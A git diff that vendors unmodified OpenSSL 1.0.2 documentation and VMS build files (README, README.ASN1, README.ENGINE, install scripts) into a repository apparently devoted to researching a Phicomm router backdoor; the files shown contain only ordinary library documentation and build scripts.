+ OpenSSL license plus the SSLeay license) situation, which basically means
+ that you are free to get and use it for commercial and non-commercial
+ purposes as long as you fulfill the conditions of both licenses.
+
+ OVERVIEW
+ --------
+
+ The OpenSSL toolkit includes:
+
+ libssl.a:
+     Implementation of SSLv2, SSLv3, TLSv1 and the required code to support
+     both SSLv2, SSLv3 and TLSv1 in the one server and client.
+
+ libcrypto.a:
+     General encryption and X.509 v1/v3 stuff needed by SSL/TLS but not
+     actually logically part of it. It includes routines for the following:
+
+     Ciphers
+        libdes - EAY's libdes DES encryption package which was floating
+                 around the net for a few years, and was then relicensed by
+                 him as part of SSLeay.  It includes 15 'modes/variations'
+                 of DES (1, 2 and 3 key versions of ecb, cbc, cfb and ofb;
+                 pcbc and a more general form of cfb and ofb) including desx
+                 in cbc mode, a fast crypt(3), and routines to read
+                 passwords from the keyboard.
+        RC4 encryption,
+        RC2 encryption      - 4 different modes, ecb, cbc, cfb and ofb.
+        Blowfish encryption - 4 different modes, ecb, cbc, cfb and ofb.
+        IDEA encryption     - 4 different modes, ecb, cbc, cfb and ofb.
+
+     Digests
+        MD5 and MD2 message digest algorithms, fast implementations,
+        SHA (SHA-0) and SHA-1 message digest algorithms,
+        MDC2 message digest. A DES based hash that is popular on smart cards.
+
+     Public Key
+        RSA encryption/decryption/generation.
+            There is no limit on the number of bits.
+        DSA encryption/decryption/generation.
+            There is no limit on the number of bits.
+        Diffie-Hellman key-exchange/key generation.
+            There is no limit on the number of bits.
+
+     X.509v3 certificates
+        X509 encoding/decoding into/from binary ASN1 and a PEM
+             based ASCII-binary encoding which supports encryption with a
+             private key.  Program to generate RSA and DSA certificate
+             requests and to generate RSA and DSA certificates.
+
+     Systems
+        The normal digital envelope routines and base64 encoding.  Higher
+        level access to ciphers and digests by name.  New ciphers can be
+        loaded at run time.  The BIO io system which is a simple non-blocking
+        IO abstraction.  Current methods supported are file descriptors,
+        sockets, socket accept, socket connect, memory buffer, buffering, SSL
+        client/server, file pointer, encryption, digest, non-blocking testing
+        and null.
+
+     Data structures
+        A dynamically growing hashing system
+        A simple stack.
+        A Configuration loader that uses a format similar to MS .ini files.
+
+ openssl:
+     A command line tool that can be used for:
+        Creation of RSA, DH and DSA key parameters
+        Creation of X.509 certificates, CSRs and CRLs
+        Calculation of Message Digests
+        Encryption and Decryption with Ciphers
+        SSL/TLS Client and Server Tests
+        Handling of S/MIME signed or encrypted mail
+
+ INSTALLATION
+ ------------
+
+ To install this package under a Unix derivative, read the INSTALL file.  For
+ a Win32 platform, read the INSTALL.W32 file.  For OpenVMS systems, read
+ INSTALL.VMS.
+
+ Read the documentation in the doc/ directory.  It is quite rough, but it
+ lists the functions; you will probably have to look at the code to work out
+ how to use them. Look at the example programs.
+
+ PROBLEMS
+ --------
+
+ For some platforms, there are some known problems that may affect the user
+ or application author.  We try to collect those in doc/PROBLEMS, with current
+ thoughts on how they should be solved in a future of OpenSSL.
+
+ SUPPORT
+ -------
+
+ See the OpenSSL website www.openssl.org for details of how to obtain
+ commercial technical support.
+
+ If you have any problems with OpenSSL then please take the following steps
+ first:
+
+    - Download the current snapshot from ftp://ftp.openssl.org/snapshot/
+      to see if the problem has already been addressed
+    - Remove ASM versions of libraries
+    - Remove compiler optimisation flags
+
+ If you wish to report a bug then please include the following information in
+ any bug report:
+
+    - On Unix systems:
+        Self-test report generated by 'make report'
+    - On other systems:
+        OpenSSL version: output of 'openssl version -a'
+        OS Name, Version, Hardware platform
+        Compiler Details (name, version)
+    - Application Details (name, version)
+    - Problem Description (steps that will reproduce the problem, if known)
+    - Stack Traceback (if the application dumps core)
+
+ Email the report to:
+
+    openssl-bugs@openssl.org
+
+ Note that the request tracker should NOT be used for general assistance
+ or support queries. Just because something doesn't work the way you expect
+ does not mean it is necessarily a bug in OpenSSL.
+
+ Note that mail to openssl-bugs@openssl.org is recorded in the public
+ request tracker database (see https://www.openssl.org/support/rt.html
+ for details) and also forwarded to a public mailing list. Confidential
+ mail may be sent to openssl-security@openssl.org (PGP key available from
+ the key servers).
+
+ HOW TO CONTRIBUTE TO OpenSSL
+ ----------------------------
+
+ Development is coordinated on the openssl-dev mailing list (see
+ http://www.openssl.org for information on subscribing). If you
+ would like to submit a patch, send it to openssl-bugs@openssl.org with
+ the string "[PATCH]" in the subject. Please be sure to include a
+ textual explanation of what your patch does.
+
+ If you are unsure as to whether a feature will be useful for the general
+ OpenSSL community please discuss it on the openssl-dev mailing list first.
+ Someone may be already working on the same thing or there may be a good
+ reason as to why that feature isn't implemented.
+
+ Patches should be as up to date as possible, preferably relative to the
+ current Git or the last snapshot. They should follow the coding style of
+ OpenSSL and compile without warnings. Some of the core team developer targets
+ can be used for testing purposes, (debug-steve64, debug-geoff etc). OpenSSL
+ compiles on many varied platforms: try to ensure you only use portable
+ features.
+
+ Note: For legal reasons, contributions from the US can be accepted only
+ if a TSU notification and a copy of the patch are sent to crypt@bis.doc.gov
+ (formerly BXA) with a copy to the ENC Encryption Request Coordinator;
+ please take some time to look at
+    http://www.bis.doc.gov/Encryption/PubAvailEncSourceCodeNofify.html [sic]
+ and
+    http://w3.access.gpo.gov/bis/ear/pdf/740.pdf (EAR Section 740.13(e))
+ for the details. If "your encryption source code is too large to serve as
+ an email attachment", they are glad to receive it by fax instead; hope you
+ have a cheap long-distance plan.
+
+ Our preferred format for changes is "diff -u" output. You might
+ generate it like this:
+
+ # cd openssl-work
+ # [your changes]
+ # ./Configure dist; make clean
+ # cd ..
+ # diff -ur openssl-orig openssl-work > mydiffs.patch
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ASN1 b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ASN1
new file mode 100644
index 0000000..11bcfaf
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ASN1
@@ -0,0 +1,187 @@
+
+OpenSSL ASN1 Revision
+=====================
+
+This document describes some of the issues relating to the new ASN1 code.
+
+Previous OpenSSL ASN1 problems
+=============================
+
+OK why did the OpenSSL ASN1 code need revising in the first place? Well
+there are lots of reasons some of which are included below...
+
+1. The code is difficult to read and write. For every single ASN1 structure
+(e.g. SEQUENCE) four functions need to be written for new, free, encode and
+decode operations. This is a very painful and error prone operation. Very few
+people have ever written any OpenSSL ASN1 and those that have usually wish
+they hadn't.
+
+2. Partly because of 1. the code is bloated and takes up a disproportionate
+amount of space. The SEQUENCE encoder is particularly bad: it essentially
+contains two copies of the same operation, one to compute the SEQUENCE length
+and the other to encode it.
+
+3. The code is memory based: that is it expects to be able to read the whole
+structure from memory. This is fine for small structures but if you have a
+(say) 1Gb PKCS#7 signedData structure it isn't such a good idea...
+
+4. The code for the ASN1 IMPLICIT tag is evil. It is handled by temporarily
+changing the tag to the expected one, attempting to read it, then changing it
+back again. This means that decode buffers have to be writable even though they
+are ultimately unchanged. This gets in the way of constification.
+
+5. The handling of EXPLICIT isn't much better. It adds a chunk of code into 
+the decoder and encoder for every EXPLICIT tag.
+
+6. APPLICATION and PRIVATE tags aren't even supported at all.
+
+7. Even IMPLICIT isn't complete: there is no support for implicitly tagged
+types that are not OPTIONAL.
+
+8. Much of the code assumes that a tag will fit in a single octet. This is
+only true if the tag is 30 or less (mercifully tags over 30 are rare).
+
+9. The ASN1 CHOICE type has to be largely handled manually, there aren't any
+macros that properly support it.
+
+10. Encoders have no concept of OPTIONAL and have no error checking. If the
+passed structure contains a NULL in a mandatory field it will not be encoded,
+resulting in an invalid structure.
+
+11. It is tricky to add ASN1 encoders and decoders to external applications.
+
+Template model
+==============
+
+One of the major problems with revision is the sheer volume of the ASN1 code.
+Attempts to change (for example) the IMPLICIT behaviour would result in a
+modification of *every* single decode function. 
+
+I decided to adopt a template based approach. I'm using the term 'template'
+in a manner similar to SNACC templates: it has nothing to do with C++
+templates.
+
+A template is a description of an ASN1 module as several constant C structures.
+It describes in a machine readable way exactly how the ASN1 structure should
+behave. If this template contains enough detail then it is possible to write
+versions of new, free, encode, decode (and possibly others operations) that
+operate on templates.
+
+Instead of having to write code to handle each operation only a single
+template needs to be written. If new operations are needed (such as a 'print'
+operation) only a single new template based function needs to be written 
+which will then automatically handle all existing templates.
+
+Plans for revision
+==================
+
+The revision will consist of the following steps. Other than the first two
+these can be handled in any order.
+ 
+o Design and write template new, free, encode and decode operations, initially
+memory based. *DONE*
+
+o Convert existing ASN1 code to template form. *IN PROGRESS*
+
+o Convert an existing ASN1 compiler (probably SNACC) to output templates
+in OpenSSL form.
+
+o Add support for BIO based ASN1 encoders and decoders to handle large
+structures, initially blocking I/O.
+
+o Add support for non blocking I/O: this is quite a bit harder than blocking
+I/O.
+
+o Add new ASN1 structures, such as OCSP, CRMF, S/MIME v3 (CMS), attribute
+certificates etc etc.
+
+Description of major changes
+============================
+
+The BOOLEAN type now takes three values. 0xff is TRUE, 0 is FALSE and -1 is
+absent. The meaning of absent depends on the context. If for example the
+boolean type is DEFAULT FALSE (as in the case of the critical flag for
+certificate extensions) then -1 is FALSE, if DEFAULT TRUE then -1 is TRUE.
+Usually the value will only ever be read via an API which will hide this from
+an application.
+
+There is an evil bug in the old ASN1 code that mishandles OPTIONAL with
+SEQUENCE OF or SET OF. These are both implemented as a STACK structure. The
+old code would omit the structure if the STACK was NULL (which is fine) or if
+it had zero elements (which is NOT OK). This causes problems because an empty
+SEQUENCE OF or SET OF will result in an empty STACK when it is decoded but when
+it is encoded it will be omitted resulting in different encodings. The new code
+only omits the encoding if the STACK is NULL, if it contains zero elements it
+is encoded and empty. There is an additional problem though: because an empty
+STACK was omitted, sometimes the corresponding *_new() function would
+initialize the STACK to empty so an application could immediately use it, if
+this is done with the new code (i.e. a NULL) it wont work. Therefore a new
+STACK should be allocated first. One instance of this is the X509_CRL list of
+revoked certificates: a helper function X509_CRL_add0_revoked() has been added
+for this purpose.
+
+The X509_ATTRIBUTE structure used to have an element called 'set' which took
+the value 1 if the attribute value was a SET OF or 0 if it was a single. Due
+to the behaviour of CHOICE in the new code this has been changed to a field
+called 'single' which is 0 for a SET OF and 1 for single. The old field has
+been deleted to deliberately break source compatibility. Since this structure
+is normally accessed via higher level functions this shouldn't break too much.
+
+The X509_REQ_INFO certificate request info structure no longer has a field
+called 'req_kludge'. This used to be set to 1 if the attributes field was
+(incorrectly) omitted. You can check to see if the field is omitted now by
+checking if the attributes field is NULL. Similarly if you need to omit
+the field then free attributes and set it to NULL.
+
+The top level 'detached' field in the PKCS7 structure is no longer set when
+a PKCS#7 structure is read in. PKCS7_is_detached() should be called instead.
+The behaviour of PKCS7_get_detached() is unaffected.
+
+The values of 'type' in the GENERAL_NAME structure have changed. This is
+because the old code use the ASN1 initial octet as the selector. The new
+code uses the index in the ASN1_CHOICE template.
+
+The DIST_POINT_NAME structure has changed to be a true CHOICE type.
+
+typedef struct DIST_POINT_NAME_st {
+int type;
+union {
+	STACK_OF(GENERAL_NAME) *fullname;
+	STACK_OF(X509_NAME_ENTRY) *relativename;
+} name;
+} DIST_POINT_NAME;
+
+This means that name.fullname or name.relativename should be set
+and type reflects the option. That is if name.fullname is set then
+type is 0 and if name.relativename is set type is 1.
+
+With the old code using the i2d functions would typically involve:
+
+unsigned char *buf, *p;
+int len;
+/* Find length of encoding */
+len = i2d_SOMETHING(x, NULL);
+/* Allocate buffer */
+buf = OPENSSL_malloc(len);
+if(buf == NULL) {
+	/* Malloc error */
+}
+/* Use temp variable because &p gets updated to point to end of
+ * encoding.
+ */
+p = buf;
+i2d_SOMETHING(x, &p);
+
+
+Using the new i2d you can also do:
+
+unsigned char *buf = NULL;
+int len;
+len = i2d_SOMETHING(x, &buf);
+if(len < 0) {
+	/* Malloc error */
+}
+
+and it will automatically allocate and populate a buffer with the
+encoding. After this call 'buf' will point to the start of the
+encoding which is len bytes long.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ENGINE b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ENGINE
new file mode 100644
index 0000000..0ff8333
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/README.ENGINE
@@ -0,0 +1,289 @@
+  ENGINE
+  ======
+
+  With OpenSSL 0.9.6, a new component was added to support alternative
+  cryptography implementations, most commonly for interfacing with external
+  crypto devices (eg. accelerator cards). This component is called ENGINE,
+  and its presence in OpenSSL 0.9.6 (and subsequent bug-fix releases)
+  caused a little confusion as 0.9.6** releases were rolled in two
+  versions, a "standard" and an "engine" version. In development for 0.9.7,
+  the ENGINE code has been merged into the main branch and will be present
+  in the standard releases from 0.9.7 forwards.
+
+  There are currently built-in ENGINE implementations for the following
+  crypto devices:
+
+      o CryptoSwift
+      o Compaq Atalla
+      o nCipher CHIL
+      o Nuron
+      o Broadcom uBSec
+
+  In addition, dynamic binding to external ENGINE implementations is now
+  provided by a special ENGINE called "dynamic". See the "DYNAMIC ENGINE"
+  section below for details.
+
+  At this stage, a number of things are still needed and are being worked on:
+
+      1 Integration of EVP support.
+      2 Configuration support.
+      3 Documentation!
+
+1 With respect to EVP, this relates to support for ciphers and digests in
+  the ENGINE model so that alternative implementations of existing
+  algorithms/modes (or previously unimplemented ones) can be provided by
+  ENGINE implementations.
+
+2 Configuration support currently exists in the ENGINE API itself, in the
+  form of "control commands". These allow an application to expose to the
+  user/admin the set of commands and parameter types a given ENGINE
+  implementation supports, and for an application to directly feed string
+  based input to those ENGINEs, in the form of name-value pairs. This is an
+  extensible way for ENGINEs to define their own "configuration" mechanisms
+  that are specific to a given ENGINE (eg. for a particular hardware
+  device) but that should be consistent across *all* OpenSSL-based
+  applications when they use that ENGINE. Work is in progress (or at least
+  in planning) for supporting these control commands from the CONF (or
+  NCONF) code so that applications using OpenSSL's existing configuration
+  file format can have ENGINE settings specified in much the same way.
+  Presently however, applications must use the ENGINE API itself to provide
+  such functionality. To see first hand the types of commands available
+  with the various compiled-in ENGINEs (see further down for dynamic
+  ENGINEs), use the "engine" openssl utility with full verbosity, ie;
+       openssl engine -vvvv
+
+3 Documentation? Volunteers welcome! The source code is reasonably well
+  self-documenting, but some summaries and usage instructions are needed -
+  moreover, they are needed in the same POD format the existing OpenSSL
+  documentation is provided in. Any complete or incomplete contributions
+  would help make this happen.
+
+  STABILITY & BUG-REPORTS
+  =======================
+
+  What already exists is fairly stable as far as it has been tested, but
+  the test base has been a bit small most of the time. For the most part,
+  the vendors of the devices these ENGINEs support have contributed to the
+  development and/or testing of the implementations, and *usually* (with no
+  guarantees) have experience in using the ENGINE support to drive their
+  devices from common OpenSSL-based applications. Bugs and/or inexplicable
+  behaviour in using a specific ENGINE implementation should be sent to the
+  author of that implementation (if it is mentioned in the corresponding C
+  file), and in the case of implementations for commercial hardware
+  devices, also through whatever vendor support channels are available.  If
+  none of this is possible, or the problem seems to be something about the
+  ENGINE API itself (ie. not necessarily specific to a particular ENGINE
+  implementation) then you should mail complete details to the relevant
+  OpenSSL mailing list. For a definition of "complete details", refer to
+  the OpenSSL "README" file. As for which list to send it to;
+
+     openssl-users: if you are *using* the ENGINE abstraction, either in an
+          pre-compiled application or in your own application code.
+
+     openssl-dev: if you are discussing problems with OpenSSL source code.
+
+  USAGE
+  =====
+
+  The default "openssl" ENGINE is always chosen when performing crypto
+  operations unless you specify otherwise. You must actively tell the
+  openssl utility commands to use anything else through a new command line
+  switch called "-engine". Also, if you want to use the ENGINE support in
+  your own code to do something similar, you must likewise explicitly
+  select the ENGINE implementation you want.
+
+  Depending on the type of hardware, system, and configuration, "settings"
+  may need to be applied to an ENGINE for it to function as expected/hoped.
+  The recommended way of doing this is for the application to support
+  ENGINE "control commands" so that each ENGINE implementation can provide
+  whatever configuration primitives it might require and the application
+  can allow the user/admin (and thus the hardware vendor's support desk
+  also) to provide any such input directly to the ENGINE implementation.
+  This way, applications do not need to know anything specific to any
+  device, they only need to provide the means to carry such user/admin
+  input through to the ENGINE in question. Ie. this connects *you* (and
+  your helpdesk) to the specific ENGINE implementation (and device), and
+  allows application authors to not get buried in hassle supporting
+  arbitrary devices they know (and care) nothing about.
+
+  A new "openssl" utility, "openssl engine", has been added in that allows
+  for testing and examination of ENGINE implementations. Basic usage
+  instructions are available by specifying the "-?" command line switch.
+
+  DYNAMIC ENGINES
+  ===============
+
+  The new "dynamic" ENGINE provides a low-overhead way to support ENGINE
+  implementations that aren't pre-compiled and linked into OpenSSL-based
+  applications. This could be because existing compiled-in implementations
+  have known problems and you wish to use a newer version with an existing
+  application. It could equally be because the application (or OpenSSL
+  library) you are using simply doesn't have support for the ENGINE you
+  wish to use, and the ENGINE provider (eg. hardware vendor) is providing
+  you with a self-contained implementation in the form of a shared-library.
+  The other use-case for "dynamic" is with applications that wish to
+  maintain the smallest foot-print possible and so do not link in various
+  ENGINE implementations from OpenSSL, but instead leaves you to provide
+  them, if you want them, in the form of "dynamic"-loadable
+  shared-libraries. It should be possible for hardware vendors to provide
+  their own shared-libraries to support arbitrary hardware to work with
+  applications based on OpenSSL 0.9.7 or later. If you're using an
+  application based on 0.9.7 (or later) and the support you desire is only
+  announced for versions later than the one you need, ask the vendor to
+  backport their ENGINE to the version you need.
+
+  How does "dynamic" work?
+  ------------------------
+    The dynamic ENGINE has a special flag in its implementation such that
+    every time application code asks for the 'dynamic' ENGINE, it in fact
+    gets its own copy of it. As such, multi-threaded code (or code that
+    multiplexes multiple uses of 'dynamic' in a single application in any
+    way at all) does not get confused by 'dynamic' being used to do many
+    independent things. Other ENGINEs typically don't do this so there is
+    only ever 1 ENGINE structure of its type (and reference counts are used
+    to keep order). The dynamic ENGINE itself provides absolutely no
+    cryptographic functionality, and any attempt to "initialise" the ENGINE
+    automatically fails. All it does provide are a few "control commands"
+    that can be used to control how it will load an external ENGINE
+    implementation from a shared-library. To see these control commands,
+    use the command-line;
+
+       openssl engine -vvvv dynamic
+
+    The "SO_PATH" control command should be used to identify the
+    shared-library that contains the ENGINE implementation, and "NO_VCHECK"
+    might possibly be useful if there is a minor version conflict and you
+    (or a vendor helpdesk) is convinced you can safely ignore it.
+    "ID" is probably only needed if a shared-library implements
+    multiple ENGINEs, but if you know the engine id you expect to be using,
+    it doesn't hurt to specify it (and this provides a sanity check if
+    nothing else). "LIST_ADD" is only required if you actually wish the
+    loaded ENGINE to be discoverable by application code later on using the
+    ENGINE's "id". For most applications, this isn't necessary - but some
+    application authors may have nifty reasons for using it. The "LOAD"
+    command is the only one that takes no parameters and is the command
+    that uses the settings from any previous commands to actually *load*
+    the shared-library ENGINE implementation. If this command succeeds, the
+    (copy of the) 'dynamic' ENGINE will magically morph into the ENGINE
+    that has been loaded from the shared-library. As such, any control
+    commands supported by the loaded ENGINE could then be executed as per
+    normal. Eg. if ENGINE "foo" is implemented in the shared-library
+    "libfoo.so" and it supports some special control command "CMD_FOO", the
+    following code would load and use it (NB: obviously this code has no
+    error checking);
+
+       ENGINE *e = ENGINE_by_id("dynamic");
+       ENGINE_ctrl_cmd_string(e, "SO_PATH", "/lib/libfoo.so", 0);
+       ENGINE_ctrl_cmd_string(e, "ID", "foo", 0);
+       ENGINE_ctrl_cmd_string(e, "LOAD", NULL, 0);
+       ENGINE_ctrl_cmd_string(e, "CMD_FOO", "some input data", 0);
+
+    For testing, the "openssl engine" utility can be useful for this sort
+    of thing. For example the above code excerpt would achieve much the
+    same result as;
+
+       openssl engine dynamic \
+                 -pre SO_PATH:/lib/libfoo.so \
+                 -pre ID:foo \
+                 -pre LOAD \
+                 -pre "CMD_FOO:some input data"
+
+    Or to simply see the list of commands supported by the "foo" ENGINE;
+
+       openssl engine -vvvv dynamic \
+                 -pre SO_PATH:/lib/libfoo.so \
+                 -pre ID:foo \
+                 -pre LOAD
+
+    Applications that support the ENGINE API and more specifically, the
+    "control commands" mechanism, will provide some way for you to pass
+    such commands through to ENGINEs. As such, you would select "dynamic"
+    as the ENGINE to use, and the parameters/commands you pass would
+    control the *actual* ENGINE used. Each command is actually a name-value
+    pair and the value can sometimes be omitted (eg. the "LOAD" command).
+    Whilst the syntax demonstrated in "openssl engine" uses a colon to
+    separate the command name from the value, applications may provide
+    their own syntax for making that separation (eg. a win32 registry
+    key-value pair may be used by some applications). The reason for the
+    "-pre" syntax in the "openssl engine" utility is that some commands
+    might be issued to an ENGINE *after* it has been initialised for use.
+    Eg. if an ENGINE implementation requires a smart-card to be inserted
+    during initialisation (or a PIN to be typed, or whatever), there may be
+    a control command you can issue afterwards to "forget" the smart-card
+    so that additional initialisation is no longer possible. In
+    applications such as web-servers, where potentially volatile code may
+    run on the same host system, this may provide some arguable security
+    value. In such a case, the command would be passed to the ENGINE after
+    it has been initialised for use, and so the "-post" switch would be
+    used instead. Applications may provide a different syntax for
+    supporting this distinction, and some may simply not provide it at all
+    ("-pre" is almost always what you're after, in reality).
+
+  How do I build a "dynamic" ENGINE?
+  ----------------------------------
+    This question is trickier - currently OpenSSL bundles various ENGINE
+    implementations that are statically built in, and any application that
+    calls the "ENGINE_load_builtin_engines()" function will automatically
+    have all such ENGINEs available (and occupying memory). Applications
+    that don't call that function have no ENGINEs available like that and
+    would have to use "dynamic" to load any such ENGINE - but on the other
+    hand such applications would only have the memory footprint of any
+    ENGINEs explicitly loaded using user/admin provided control commands.
+    The main advantage of not statically linking ENGINEs and only using
+    "dynamic" for hardware support is that any installation using no
+    "external" ENGINE suffers no unnecessary memory footprint from unused
+    ENGINEs. Likewise, installations that do require an ENGINE incur the
+    overheads from only *that* ENGINE once it has been loaded.
+
+    Sounds good? Maybe, but currently building an ENGINE implementation as
+    a shared-library that can be loaded by "dynamic" isn't automated in
+    OpenSSL's build process. It can be done manually quite easily however.
+    Such a shared-library can either be built with any OpenSSL code it
+    needs statically linked in, or it can link dynamically against OpenSSL
+    if OpenSSL itself is built as a shared library. The instructions are
+    the same in each case, but in the former (statically linked any
+    dependencies on OpenSSL) you must ensure OpenSSL is built with
+    position-independent code ("PIC"). The default OpenSSL compilation may
+    already specify the relevant flags to do this, but you should consult
+    with your compiler documentation if you are in any doubt.
+
+    This example will show building the "atalla" ENGINE in the
+    crypto/engine/ directory as a shared-library for use via the "dynamic"
+    ENGINE.
+    1) "cd" to the crypto/engine/ directory of a pre-compiled OpenSSL
+       source tree.
+    2) Recompile at least one source file so you can see all the compiler
+       flags (and syntax) being used to build normally. Eg;
+           touch hw_atalla.c ; make
+       will rebuild "hw_atalla.o" using all such flags.
+    3) Manually enter the same compilation line to compile the
+       "hw_atalla.c" file but with the following two changes;
+         (a) add "-DENGINE_DYNAMIC_SUPPORT" to the command line switches,
+	 (b) change the output file from "hw_atalla.o" to something new,
+             eg. "tmp_atalla.o"
+    4) Link "tmp_atalla.o" into a shared-library using the top-level
+       OpenSSL libraries to resolve any dependencies. The syntax for doing
+       this depends heavily on your system/compiler and is a nightmare
+       known well to anyone who has worked with shared-library portability
+       before. 'gcc' on Linux, for example, would use the following syntax;
+          gcc -shared -o dyn_atalla.so tmp_atalla.o -L../.. -lcrypto
+    5) Test your shared library using "openssl engine" as explained in the
+       previous section. Eg. from the top-level directory, you might try;
+          apps/openssl engine -vvvv dynamic \
+              -pre SO_PATH:./crypto/engine/dyn_atalla.so -pre LOAD
+       If the shared-library loads successfully, you will see both "-pre"
+       commands marked as "SUCCESS" and the list of control commands
+       displayed (because of "-vvvv") will be the control commands for the
+       *atalla* ENGINE (ie. *not* the 'dynamic' ENGINE). You can also add
+       the "-t" switch to the utility if you want it to try and initialise
+       the atalla ENGINE for use to test any possible hardware/driver
+       issues.
+
+  PROBLEMS
+  ========
+
+  It seems like the ENGINE part doesn't work too well with CryptoSwift on Win32.
+  A quick test done right before the release showed that trying "openssl speed
+  -engine cswift" generated errors. If the DSO gets enabled, an attempt is made
+  to write at memory address 0x00000002.
+
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/TODO b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/TODO
new file mode 100644
index 0000000..359e069
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/TODO
@@ -0,0 +1,18 @@
+TODO:
+=====
+
+There are a few things that need to be worked out in the VMS version of
+OpenSSL, still:
+
+- Description files. ("Makefile's" :-))
+- Script code to link an already compiled build tree.
+- A VMSINSTALlable version (way in the future, unless someone else hacks).
+- shareable images (DLL for you Windows folks).
+
+There may be other things that I have missed and that may be desirable.
+Please send mail to <openssl-users@openssl.org> or to me directly if you
+have any ideas.
+
+--
+Richard Levitte <richard@levitte.org>
+1999-05-24
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/VMSify-conf.pl b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/VMSify-conf.pl
new file mode 100644
index 0000000..d3be6a2
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/VMSify-conf.pl
@@ -0,0 +1,34 @@
+#! /usr/bin/perl
+
+use strict;
+use warnings;
+
+my @directory_vars = ( "dir", "certs", "crl_dir", "new_certs_dir" );
+my @file_vars = ( "database", "certificate", "serial", "crlnumber",
+		  "crl", "private_key", "RANDFILE" );
+while(<STDIN>) {
+    chomp;
+    foreach my $d (@directory_vars) {
+	if (/^(\s*\#?\s*${d}\s*=\s*)\.\/([^\s\#]*)([\s\#].*)$/) {
+	    $_ = "$1sys\\\$disk:\[.$2$3";
+	} elsif (/^(\s*\#?\s*${d}\s*=\s*)(\w[^\s\#]*)([\s\#].*)$/) {
+	    $_ = "$1sys\\\$disk:\[.$2$3";
+	}
+	s/^(\s*\#?\s*${d}\s*=\s*\$\w+)\/([^\s\#]*)([\s\#].*)$/$1.$2\]$3/;
+	while(/^(\s*\#?\s*${d}\s*=\s*(\$\w+\.|sys\\\$disk:\[\.)[\w\.]+)\/([^\]]*)\](.*)$/) {
+	    $_ = "$1.$3]$4";
+	}
+    }
+    foreach my $f (@file_vars) {
+	s/^(\s*\#?\s*${f}\s*=\s*)\.\/(.*)$/$1sys\\\$disk:\[\/$2/;
+	while(/^(\s*\#?\s*${f}\s*=\s*(\$\w+|sys\\\$disk:\[)[^\/]*)\/(\w+\/[^\s\#]*)([\s\#].*)$/) {
+	    $_ = "$1.$3$4";
+	}
+	if (/^(\s*\#?\s*${f}\s*=\s*(\$\w+|sys\\\$disk:\[)[^\/]*)\/(\w+)([\s\#].*)$/) {
+	    $_ = "$1]$3.$4";
+	} elsif  (/^(\s*\#?\s*${f}\s*=\s*(\$\w+|sys\\\$disk:\[)[^\/]*)\/([^\s\#]*)([\s\#].*)$/) {
+	    $_ = "$1]$3$4";
+	}
+   }
+    print $_,"\n";
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/WISHLIST.TXT b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/WISHLIST.TXT
new file mode 100644
index 0000000..c151fc8
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/WISHLIST.TXT
@@ -0,0 +1,4 @@
+* Have the building procedure contain a LINK-only possibility.
+  Wished by Mark Daniel <mark.daniel@dsto.defence.gov.au>
+
+  One way to enable that is also to go over to DESCRIP.MMS files.
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/install-vms.com b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/install-vms.com
new file mode 100755
index 0000000..7da8b21
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/VMS/install-vms.com
@@ -0,0 +1,67 @@
+$! install-vms.com -- Installs the files in a given directory tree
+$!
+$! Author: Richard Levitte <richard@levitte.org>
+$! Time of creation: 23-MAY-1998 19:22
+$!
+$! P1	root of the directory tree
+$!
+$!
+$! Announce/identify.
+$!
+$ proc = f$environment( "procedure")
+$ write sys$output "@@@ "+ -
+   f$parse( proc, , , "name")+ f$parse( proc, , , "type")
+$!
+$ on error then goto tidy
+$ on control_c then goto tidy
+$!
+$ if p1 .eqs. ""
+$ then
+$   write sys$output "First argument missing."
+$   write sys$output -
+     "Should be the directory where you want things installed."
+$   exit
+$ endif
+$
+$ if (f$getsyi( "cpu") .lt. 128)
+$ then
+$   arch = "VAX"
+$ else
+$   arch = f$edit( f$getsyi( "arch_name"), "upcase")
+$   if (arch .eqs. "") then arch = "UNK"
+$ endif
+$
+$ root = f$parse( P1, "[]A.;0", , , "SYNTAX_ONLY, NO_CONCEAL")- "A.;0"
+$ root_dev = f$parse( root, , , "device", "syntax_only")
+$ root_dir = f$parse( root, , , "directory", "syntax_only") - -
+   "[000000." - "][" - "[" - "]"
+$ root = root_dev + "[" + root_dir
+$
+$ define /nolog wrk_sslroot 'root'.] /translation_attributes = concealed
+$ define /nolog wrk_sslinclude wrk_sslroot:[include]
+$
+$ if f$parse( "wrk_sslroot:[000000]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[000000]
+$ if f$parse( "wrk_sslinclude:") .eqs. "" then -
+   create /directory /log wrk_sslinclude:
+$ if f$parse( "wrk_sslroot:[vms]") .eqs. "" then -
+   create /directory /log wrk_sslroot:[vms]
+$!
+$ copy /log /protection = world:re openssl_startup.com wrk_sslroot:[vms]
+$ copy /log /protection = world:re openssl_undo.com wrk_sslroot:[vms]
+$ copy /log /protection = world:re openssl_utils.com wrk_sslroot:[vms]
+$!
+$ tidy:
+$!
+$ call deass wrk_sslroot
+$ call deass wrk_sslinclude
+$!
+$ exit
+$!
+$ deass: subroutine
+$ if (f$trnlnm( p1, "LNM$PROCESS") .nes. "")
+$ then
+$   deassign /process 'p1'
+$ endif
+$ endsubroutine
+$!
